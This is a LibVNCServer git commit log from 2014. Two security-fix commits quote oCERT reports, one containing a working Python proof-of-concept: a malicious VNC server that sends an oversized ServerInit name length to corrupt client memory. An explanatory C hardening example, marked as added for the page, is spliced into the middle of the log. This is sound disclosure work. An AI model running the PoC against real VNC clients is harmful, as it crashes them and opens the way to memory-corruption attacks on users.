Commit message  (Author, Date; Files, Lines -/+)
* Fix possible libvncclient ServerInit memory corruption.  (Christian Beier, 2014-10-10; 1 file, -1/+2)
|   This fixes the following oCERT report (oCERT-2014-008 pt.2):
|
|   There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client.
|
|   Field          Size
|   ---------------------------------
|   name-length    [4]
|   name-string    [name-length]
|
|   Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be a segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (or the wrong port on the malicious server) and then connect to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd. Just run the script, it will listen on port 5900, and connect to it with krdc for example. I have observed Remmina crash more reliably.
|
|   import socket,struct,sys
|
|   HOST = ""
|   PORT = 5900
|   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|   c.bind((HOST,PORT))
|   c.listen(1)
|   conn,addr = c.accept()
|   print "Connected by ", addr
|
|   protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
|   conn.send(protocolVersion3008)
|   data = conn.recv(1024) # Receive the version from them.
|
|   secTypeNone = "\x01\x01"
|   secTypeAuth = "\x01\x02"
|   conn.send(secTypeNone)
|   data = conn.recv(1024) # Receive the secType choice from them.
|
|   secResultOk = "\x00" * 4
|   secResultNo = "\x00\x00\x00\x01"
|   conn.send(secResultOk)
|   data = conn.recv(1024) # Receive the ClientInit (Shared-flag).
|
|   frameBufferWidth = 0x0480
|   frameBufferHeight = 0x0360
|   bitsPerPixel = 0x20
|   depth = 0x18
|   bigEndian = 0x1
|   trueColor = 0x0
|   redM = 0x0
|   greenM = 0x0
|   blueM = 0x0
|   redS = 0x0
|   greenS = 0x0
|   blueS = 0x0
|   padding = "\x00\x00\x00"
|   nameLength = 0xffffffff
|   nameString = "AA" * 0xFFFF + "\x00\x0a"
|
|   conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString )
|   c.close()
* Fix potential memory corruption in libvncclient.  (Christian Beier, 2014-10-10; 1 file, -0/+7)
|   Fixes (maybe amongst others) the following oCERT report ([oCERT-2014-008]):
|
|   LibVNCServer HandleRFBServerMessage rfbServerCutText malicious msg.sct.length
|
|   It looks like there may be a chance for potential memory corruption when a LibVNCServer client attempts to process a Server Cut Text message.
|
|   case rfbServerCutText:
|   {
|       char *buffer;
|
|       if (!ReadFromRFBServer(client, ((char *)&msg) + 1, sz_rfbServerCutTextMsg - 1))
|           return FALSE;
|       msg.sct.length = rfbClientSwap32IfLE(msg.sct.length);  << Retrieve malicious length
|       buffer = malloc(msg.sct.length+1);                       << Allocate buffer. Can return 0x0
|       if (!ReadFromRFBServer(client, buffer, msg.sct.length))  << Attempt to write to buffer
|           return FALSE;
|       buffer[msg.sct.length] = 0;                              << Attempt to write to buffer
|       if (client->GotXCutText)
|           client->GotXCutText(client, buffer, msg.sct.length); << Attempt to write to buffer
|       free(buffer);
|       break;
|   }
|
|   If a message is provided with an extremely large size it is possible to cause the malloc to fail, further leading to an attempt to write 0x0.
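Both oCERT reports above describe the same defensive gap: a 32-bit length taken from the wire is used in `length + 1` and passed straight to `malloc()` without a bound or a NULL check, so a declared length of 0xffffffff wraps the allocation size to 0 and every later write lands outside the object. The C program below is an added illustration written for this page; it is not the project's patch and not the reporter's code. It shows the wraparound arithmetic and a bounded reader for any "length [4] / bytes [length]" field (ServerInit name, ServerCutText text) that rejects the field before allocating. The cap `RFB_MAX_FIELD_LEN`, the in-memory `rfb_stream`, and the function names are assumptions for the example; the stream stands in for `ReadFromRFBServer()`.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Upper bound accepted for any length-prefixed field (server name, cut text).
 * This cap is an assumption for the example, not a value taken from LibVNCServer. */
#define RFB_MAX_FIELD_LEN (1u << 20)

/* Constructed in-memory byte stream standing in for the client's socket. */
typedef struct {
    const unsigned char *data;
    size_t len;
    size_t pos;
} rfb_stream;

/* Stand-in for ReadFromRFBServer(): copy exactly n bytes or fail. */
static int stream_read(rfb_stream *s, void *out, size_t n) {
    if (n > s->len - s->pos)
        return 0;
    memcpy(out, s->data + s->pos, n);
    s->pos += n;
    return 1;
}

/* The allocation size the reported code computed: length + 1 in uint32_t
 * arithmetic. For a declared length of 0xffffffff this wraps to 0, so
 * malloc(0) is called and every later write lands outside the object. */
uint32_t unchecked_alloc_size(uint32_t declared_len) {
    return declared_len + 1;
}

/* Hardened reader for a "length [4] / bytes [length]" field.
 * Returns a NUL-terminated heap copy, or NULL if the field is oversized,
 * the allocation fails, or the stream ends before `length` bytes arrive. */
char *read_length_prefixed(rfb_stream *s, uint32_t cap) {
    unsigned char raw[4];
    if (!stream_read(s, raw, sizeof raw))
        return NULL;
    /* RFB is big-endian on the wire; assemble explicitly rather than using
       the project's swap macro so the example stays self-contained. */
    uint32_t len = ((uint32_t)raw[0] << 24) | ((uint32_t)raw[1] << 16) |
                   ((uint32_t)raw[2] << 8)  |  (uint32_t)raw[3];
    /* Bound the length before any arithmetic or allocation depends on it. */
    if (len > cap)
        return NULL;
    char *buf = malloc((size_t)len + 1);
    if (!buf)                       /* the reported code skipped this check */
        return NULL;
    if (!stream_read(s, buf, len)) {
        free(buf);
        return NULL;
    }
    buf[len] = '\0';
    return buf;
}

/* Well-formed field: length 4 followed by "desk". Returns 1 on success. */
int demo_valid_field(void) {
    static const unsigned char msg[] = { 0, 0, 0, 4, 'd', 'e', 's', 'k' };
    rfb_stream s = { msg, sizeof msg, 0 };
    char *v = read_length_prefixed(&s, RFB_MAX_FIELD_LEN);
    int ok = v != NULL && strcmp(v, "desk") == 0;
    free(v);
    return ok;
}

/* Length field of 0xffffffff, as in the oCERT report. Returns 1 if rejected. */
int demo_oversized_field(void) {
    static const unsigned char msg[] = { 0xff, 0xff, 0xff, 0xff, 'A', 'A' };
    rfb_stream s = { msg, sizeof msg, 0 };
    return read_length_prefixed(&s, RFB_MAX_FIELD_LEN) == NULL;
}

/* Declared length exceeds the bytes that actually arrive. Returns 1 if rejected. */
int demo_truncated_field(void) {
    static const unsigned char msg[] = { 0, 0, 0, 10, 'a', 'b', 'c' };
    rfb_stream s = { msg, sizeof msg, 0 };
    return read_length_prefixed(&s, RFB_MAX_FIELD_LEN) == NULL;
}

int main(void) {
    printf("alloc size for len 0xffffffff in the reported code: %u\n",
           unchecked_alloc_size(0xffffffffu));
    printf("valid field accepted: %d\n", demo_valid_field());
    printf("oversized field rejected: %d\n", demo_oversized_field());
    printf("truncated field rejected: %d\n", demo_truncated_field());
    return 0;
}
```

The order of checks matters: the bound is applied to the raw wire value before `len + 1` is ever computed, the `malloc()` result is tested before it is written to, and a short read frees the buffer instead of leaving a partially filled allocation for the caller to terminate and hand to `GotXCutText`.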
* Update NEWS for 0.9.10.  (Christian Beier, 2014-10-09; 1 file, -0/+23)
|
* Update AUTHORS.  (Christian Beier, 2014-10-09; 1 file, -1/+3)
|
* Merge pull request #42 from LibVNC/autotools-fix-revisited  (dscho, 2014-10-07; 4 files, -0/+1114)
|\
| |   Add autoconf macros that might not be installed with a usual autotools setup
| * Ship the required macros in the m4/ directory.  (Christian Beier, 2014-10-07; 4 files, -0/+1114)
| |   This is recommended practice as per https://www.gnu.org/software/automake/manual/html_node/Local-Macros.html.
| |
| |   It fixes the problem that arose when one of the maintainers could not build LibVNCServer after https://github.com/LibVNC/libvncserver/pull/38 was merged. Symptoms included
| |
| |       checking whether make sets $(MAKE)... yes
| |       ./configure: line 2481: syntax error near unexpected token `rfb/rfbconfig.h'
| |       ./configure: line 2481: `AX_PREFIX_CONFIG_H(rfb/rfbconfig.h)'
| |
| |   until autoconf-archive was installed (which was a previously unmentioned requirement for Pull Request #38) – this is not always an option, in particular when the project needs to be built using a system-wide autoconf installation that cannot be modified easily by the developer.
* | Add back a working autogen.sh  (Johannes Schindelin, 2014-10-07; 1 file, -0/+4)
| |   There was no reason to get rid of the convenient script. Most developers who are not in love with autoconf fail to remember that autoreconf invocation, therefore it is better to have something working in place.
| |
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | Fix stack-based buffer overflow  (Nicolas Ruff, 2014-10-07; 1 file, -1/+2)
| |   There was a possible buffer overflow in rfbFileTransferOffer message when processing the FileTime.
| |
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | Merge pull request #41 from newsoft/master  (dscho, 2014-10-07; 2 files, -9/+52)
|\ \
| | |   Fixing 2 security issues
| * | Fix multiple stack-based buffer overflows in file transfer feature  (newsoft, 2014-10-06; 1 file, -8/+30)
| | |
| * | Make sure that no integer overflow could occur during scaling  (newsoft, 2014-10-06; 1 file, -1/+22)
|/ /
* | Add libvncclient/h264.c to dist tarball.  (Christian Beier, 2014-10-06; 1 file, -1/+1)
| |   Otherwise the sources from a 'make dist' package wouldn't compile.
* | Really add empty m4 subdirectory.  (Christian Beier, 2014-10-03; 1 file, -0/+1)
| |   This change kinda got lost with the last commit re-splitting.
* | Merge pull request #38 from LibVNC/autotools-fix-revisited  (Christian Beier, 2014-10-02; 13 files, -14227/+15)
|\ \
| |/
| |   Autotools fix revisited.
| * INSTALL and ltmain.sh need those leading slashes.  (Christian Beier, 2014-10-02; 1 file, -2/+2)
| |   .dirstamp, OTOH, is to be expected in several subdirectories.
| * add a few more ignores  (Brian Bidulock, 2014-10-02; 1 file, -0/+3)
| |
| * removed autogen.sh  (Brian Bidulock, 2014-10-02; 1 file, -57/+0)
| |   - no longer applicable: use autoreconf -fiv
| * Remove autotools-related files that will get installed by autoreconf -i.  (Christian Beier, 2014-10-02; 3 files, -14161/+0)
| |
| * Use an m4 script subdirectory, fix automake init and two macro names.  (Brian Bidulock, 2014-10-02; 2 files, -3/+6)
| |
| * Rename obsolete INCLUDES to AM_CPPFLAGS  (Brian Bidulock, 2014-10-02; 6 files, -6/+6)
| |
* | Update noVNC HTML5 client to latest version from https://github.com/kanaka/noVNC.  (Christian Beier, 2014-10-02; 30 files, -5951/+6797)
| |
* | Close unclosed comments ;-)  (Johannes Schindelin, 2014-09-30; 1 file, -2/+2)
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | Merge pull request #36 from danielgindi/master  (dscho, 2014-09-30; 1 file, -0/+2)
|\ \
| | |   A forgotten `#ifdef WIN32` broke UNIX build.
| * | A forgotten `#ifdef WIN32` broke UNIX build.  (Daniel Cohen Gindi, 2014-09-30; 1 file, -0/+2)
|/ /
* | Merge pull request #33 from danielgindi/master  (dscho, 2014-09-30; 14 files, -30/+327)
|\ \
| |/
|/|   More MSVC adjustments, now focuses on the libvncserver
| * Signal is a fundamental UNIX function, and must be omitted for any windows compilation  (Daniel Cohen Gindi, 2014-09-20; 1 file, -1/+1)
| |
| * These are UNIX headers, and are not available on MSVC  (Daniel Cohen Gindi, 2014-09-20; 1 file, -0/+5)
| |
| * Those are generally the windows headers, not just MinGW  (Daniel Cohen Gindi, 2014-09-20; 1 file, -2/+2)
| |
| * On windows, use the Win32 calls for directory enumerations.  (Daniel Cohen Gindi, 2014-09-20; 1 file, -3/+78)
| |   We also do not need the conversion between UNIX values to Windows values in the RTF_FIND_DATA struct, as we already are on windows.
| * Generally adjusting headers for compiling on windows without the mixing of Winsock 1 and 2.  (Daniel Cohen Gindi, 2014-09-20; 4 files, -1/+19)
| |
| * Just use a macro to bridge to the Win32 version of `mkdir`  (Daniel Cohen Gindi, 2014-09-20; 1 file, -5/+6)
| |   The additional compat_mkdir function was not necessary at all.
| * Use correct `winsock2.h` version header instead of winsock.h.  (Daniel Cohen Gindi, 2014-09-20; 1 file, -2/+4)
| |   `windows.h` is referring to `winsock.h` (unless the `WIN32_LEAN_AND_MEAN` is defined). The structs used in this header are defined in `winsock2.h` or in `winsock.h`, but we are using Winsock2 of course! So we have to include winsock2.h and refrain from including windows.h here
| * Fixed a violation of the C89 standard ("declarations must come before instructions")  (Daniel Cohen Gindi, 2014-09-20; 3 files, -10/+16)
| |
| * A windows version for directory enumerations  (Daniel Cohen Gindi, 2014-09-20; 1 file, -0/+147)
| |   Basically taken from https://github.com/danielgindi/FileDir with some adjustments
| * MSVC also has the __FUNCTION__ predefined  (Daniel Cohen Gindi, 2014-09-20; 1 file, -1/+1)
| |
| * `CreateDirectory` might clash with the `CreateDirectoryA`/`CreateDirectoryW` macros on MSVC  (Daniel Cohen Gindi, 2014-09-20; 2 files, -1/+13)
| |
| * Fail when NULL is passed to CreateFileListInfo()  (Daniel Cohen Gindi, 2014-09-20; 1 file, -2/+6)
| |   Passing NULL to sprintf() would most likely crash the program.
| * `strings.h` and `resolv.h` are not available on MSVC, and some POSIX functions are renamed or deprecated  (Daniel Cohen Gindi, 2014-09-20; 6 files, -2/+29)
|/
|   For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* The HAVE_X11 define is not there anymore, but we don't need it either.  (Christian Beier, 2014-09-09; 1 file, -5/+1)
|
* Move vncterm to https://github.com/LibVNC/vncterm.  (Christian Beier, 2014-09-09; 12 files, -1296/+2)
|
* Move VisualNaCro to https://github.com/LibVNC/VisualNaCro.  (Christian Beier, 2014-09-09; 12 files, -1942/+0)
|
* Move prepare_x11vnc_dist.sh over to x11vnc repo.  (Christian Beier, 2014-09-09; 1 file, -140/+0)
|
* Remove x11vnc from autotools build system. [factor-out-x11vnc]  (Christian Beier, 2014-09-03; 2 files, -433/+2)
|
* Remove tightvnc-1.3dev5-vncviewer-alpha-cursor.patch.  (Christian Beier, 2014-09-03; 1 file, -143/+0)
|
* Remove x11vnc subdir.  (Christian Beier, 2014-09-03; 176 files, -210670/+0)
|   The new x11vnc repo is at https://github.com/LibVNC/x11vnc.
* Fix tv_usec calculation  (Johannes Schindelin, 2014-09-02; 1 file, -1/+1)
|   This bug was introduced in the MSVC patches.
|
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Merge branch 'msvc'  (Johannes Schindelin, 2014-09-02; 10 files, -32/+389)
|\
| |   This topic branch provides compatibility for Windows, without the MINGW32 dependency.
| |
| |   It is based on https://github.com/LibVNC/libvncserver/pull/22.
| |
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * Use Windows' critical sections to emulate pthread's mutexes  (Daniel Cohen Gindi, 2014-09-02; 1 file, -13/+36)
| |   With Microsoft Visual C++, we cannot use pthreads (MinGW sports an emulation library which is the reason we did not need Windows-specific hacks earlier). Happily, it is very easy to provide Windows-specific emulations for the pthread calls we use.
| |
| |   [JES: fixed commit message]
| |
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * Perform pointer arithmetic on char * instead of void *  (Daniel Cohen Gindi, 2014-09-02; 1 file, -1/+1)
| |   Microsoft Visual C++ does not allow pointer arithmetic on void pointers.
| |
| |   [JES: fixed commit message]
| |
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * MSVC: Use the Unix emulation headers  (Daniel Cohen Gindi, 2014-09-02; 2 files, -1/+11)
| |   [JES: provided commit message, split out unrelated changes]
| |
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>